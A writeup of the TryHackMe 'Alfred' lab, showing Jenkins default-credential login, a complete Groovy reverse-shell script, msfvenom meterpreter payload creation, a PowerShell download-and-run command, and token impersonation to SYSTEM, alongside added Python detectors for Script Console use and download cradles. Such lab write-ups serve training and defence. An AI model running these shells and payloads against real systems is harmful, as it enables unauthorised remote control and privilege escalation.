TryHackMe: Alfred Room Writeup

sy is typing
Dec 10, 2020 · 4 min read

Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens. https://www.tryhackme.com/room/alfred

Task 1: Initial Access

How many ports are open? (TCP only)

We do the usual nmap scan here:

export rhost=1.1.1.1  # target machine ip
nmap -sV --script vuln $rhost | tee nmap-$rhost.out
grep open nmap-$rhost.out

3

What is the username and password for the log in panel (in the format username:password)?

In the browser, go to $rhost:8080 and we see a login page. Try the first thing that comes to mind, and we’re in!


admin:admin

What is the user.txt flag?

Click around the Jenkins pages. There is more than one way to get a reverse shell; I find the easiest is to use the Script Console. (This doesn’t really follow the steps in the task description, which involve creating a new Jenkins build that runs a Windows batch command.)

In the left sidebar, navigate to “Manage Jenkins” > “Script Console”, or just go to $rhost:8080/script

Very inviting, it even has instructions on the type of script to run!

As explained in the page, the script console allows us to run “an arbitrary Groovy script”, nice. Let’s first start a netcat listener.

nc -lvnp 4444

Now let’s google for a Groovy script. We’ll find one here (use Alternative 1, which is “more stealthy”). Change the host and port to your values, then paste it into the Script Console and run it. Almost immediately, we’ll see a reverse shell in the listener.

Thread.start {
String host="10.0.0.1";
int port=4242;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};
p.destroy();s.close();
}
I’m BATMAN
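
From the defender’s side, the Script Console run above leaves a trace: a POST to /script (or /scriptText for the API form) in the Jenkins access log, usually preceded by the login. The following added example (mine, not the writeup’s) parses constructed NCSA-style access log lines, assuming Jenkins access logging is enabled in that format and that the login form posts to the default /j_acegi_security_check path, and flags Script Console executions and repeated login-form POSTs from one source.

```python
"""Flag Jenkins Script Console executions and login bursts in access-log lines.
Added example, not from the writeup. Assumes NCSA-style access log lines;
the sample lines below are constructed."""
import re
from collections import Counter

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Both endpoints run arbitrary Groovy on the controller: the web form and the API form.
SCRIPT_ENDPOINTS = {"/script", "/scriptText"}
LOGIN_ENDPOINT = "/j_acegi_security_check"  # Jenkins login form target (assumed default)

SAMPLE_LOG = """\
10.10.14.5 - - [10/Dec/2020:10:01:02 +0000] "GET /login HTTP/1.1" 200 3021
10.10.14.5 - - [10/Dec/2020:10:01:05 +0000] "POST /j_acegi_security_check HTTP/1.1" 302 0
10.10.14.5 - - [10/Dec/2020:10:01:07 +0000] "POST /j_acegi_security_check HTTP/1.1" 302 0
10.10.14.5 - - [10/Dec/2020:10:01:09 +0000] "POST /j_acegi_security_check HTTP/1.1" 302 0
10.10.14.5 - admin [10/Dec/2020:10:01:40 +0000] "GET /script HTTP/1.1" 200 5120
10.10.14.5 - admin [10/Dec/2020:10:01:58 +0000] "POST /script HTTP/1.1" 200 640
10.10.3.7 - builder [10/Dec/2020:10:02:10 +0000] "POST /job/app/build HTTP/1.1" 201 0
"""

def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def analyse(log_text, login_threshold=3):
    """Return (script_console_runs, login_burst_ips) for a block of log text."""
    runs, login_posts = [], Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        base = rec["path"].split("?", 1)[0]   # drop any query string
        if rec["method"] != "POST":
            continue                           # a GET only renders the form
        if base in SCRIPT_ENDPOINTS:
            runs.append((rec["ts"], rec["ip"], rec["user"], base))
        elif base == LOGIN_ENDPOINT:
            login_posts[rec["ip"]] += 1
    bursts = sorted(ip for ip, n in login_posts.items() if n >= login_threshold)
    return runs, bursts

if __name__ == "__main__":
    print(analyse(SAMPLE_LOG))
```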

Task 2: Switching Shells

What is the final size of the exe payload that you generated?

Let’s generate the payload!

export lhost=1.1.1.1  # your local ip
export lport=4445  # local port the payload will connect back to
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=$lhost LPORT=$lport -f exe -o alfred.exe

73802

Task 3: Privilege Escalation

To check which tokens are available, enter the list_tokens -g. … What is the output when you run the getuid command?

Now we need to get a reverse shell again, this time with Metasploit. (Note: the steps here deviate from the task description).

To get the payload onto the remote machine, we need to start an HTTP server. On our local machine, run this:

python3 -m http.server

Then in another session, start Metasploit and create a listener. LHOST is your machine’s IP, and LPORT must match the port the payload was generated with (4445 above):

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 1.1.1.1
set LPORT 4445
run -j

Now in the remote shell, run this to download the payload that we had created earlier (remember to change the host):

powershell -c "(New-Object System.Net.WebClient).Downloadfile('http://1.1.1.1:8000/alfred.exe','alfred.exe')"

Then start it:

powershell -c Start-Process "alfred.exe"

We should now have a meterpreter session!
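
On the Windows host, the download-and-run steps above show up as process creation events: a shell spawned by the Jenkins java.exe, then a PowerShell WebClient.DownloadFile command line. The added example below (mine, not the writeup’s) runs those two detection rules over constructed records shaped like Sysmon Event ID 1 fields; the field names and the Jenkins install path are assumptions.

```python
"""Flag Jenkins-spawned shells and PowerShell download cradles in process-creation records.
Added example, not from the writeup. Records mimic Sysmon Event ID 1 fields
(field names and paths are assumptions); the sample records are constructed."""
import re

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
JENKINS_PARENTS = {"java.exe"}   # the Jenkins controller runs inside a JVM
# Matches the WebClient download cradle regardless of case or spacing.
CRADLE_RE = re.compile(r"New-Object\s+(?:System\.)?Net\.WebClient.*\.DownloadFile\(", re.I)

RECORDS = [  # constructed sample records
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files (x86)\Jenkins\jre\bin\java.exe",
     "User": r"alfred\bruce", "CommandLine": "cmd.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": r"alfred\bruce",
     "CommandLine": r'''powershell -c "(New-Object System.Net.WebClient).Downloadfile('http://1.1.1.1:8000/alfred.exe','alfred.exe')"'''},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": r"alfred\bruce",
     "CommandLine": 'powershell -c Start-Process "alfred.exe"'},
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "User": r"alfred\bruce", "CommandLine": "notepad.exe"},
]

def basename(path):
    """Last path component, lower-cased, so rules compare image names only."""
    return path.rsplit("\\", 1)[-1].lower()

def classify(rec):
    """Return the names of the rules that fire for one record."""
    hits = []
    if basename(rec["Image"]) in SHELLS and basename(rec["ParentImage"]) in JENKINS_PARENTS:
        hits.append("jenkins_spawned_shell")
    if CRADLE_RE.search(rec["CommandLine"]):
        hits.append("powershell_download_cradle")
    return hits

def scan(records):
    """(record index, rule name) for every rule hit across the records."""
    return [(i, h) for i, rec in enumerate(records) for h in classify(rec)]

if __name__ == "__main__":
    for i, rule in scan(RECORDS):
        print(f"record {i}: {rule} ({RECORDS[i]['CommandLine']})")
```

The Start-Process launch in record 2 is deliberately not matched by either rule: its signal is the parent chain back to Jenkins, which needs the process lineage these flat records do not carry.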


Activate it, use the incognito module and impersonate the token:

use incognito
impersonate_token "BUILTIN\Administrators"

NT AUTHORITY\SYSTEM

Read the root.txt file at C:\Windows\System32\config

Now we need to migrate to a root process as described in the task description:

ps services
migrate <pid>

Since the migration is successful, we should be in the C:\Windows\System32 dir. So let’s just check out the flag!

